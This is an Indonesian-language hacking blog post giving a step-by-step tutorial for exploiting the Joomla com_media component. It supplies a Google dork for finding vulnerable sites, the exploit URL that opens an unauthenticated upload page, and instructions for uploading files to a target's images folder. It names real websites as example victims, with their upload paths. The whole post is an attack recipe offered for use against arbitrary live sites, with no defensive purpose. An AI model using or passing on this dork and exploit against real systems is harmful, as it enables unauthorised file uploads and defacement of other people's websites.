Oke, langsung saja.
Bahan-bahan :
Dork : inurl:com_media site:com [dork silahkan kreasikan sendiri. Kraetfitas anda yang akan menetukan banyaknya situs vuln]. :p
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
1. Oke. Langsung berburu target di google dengan dork diatas. Sebagai contoh, saya pilih http://www.skylinepark.org .
2. Lalu masukkan exploitnya. Jadi http://www.skylinepark.org/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
3. Maka kalian akan melihat tempat upload. Lihat SS :
4. Yang bisa diupload adalah file .txt .jpg .gif .png. Untuk html dan php tidak bisa. :p . Saya coba upload file .txt
5. Sekarang, kita lihat hasilnya. Letak filenya di [localhost]/images/[file.txt].
Ex : http://www.skylinepark.org/images/lol.txt, http://www.magicrete.in/images/lol.txt
6. Done.
Refrensi : http://komandanseo.blogspot.com/
Sumber : http://madura-cyber.org
0 komentar:
Post a Comment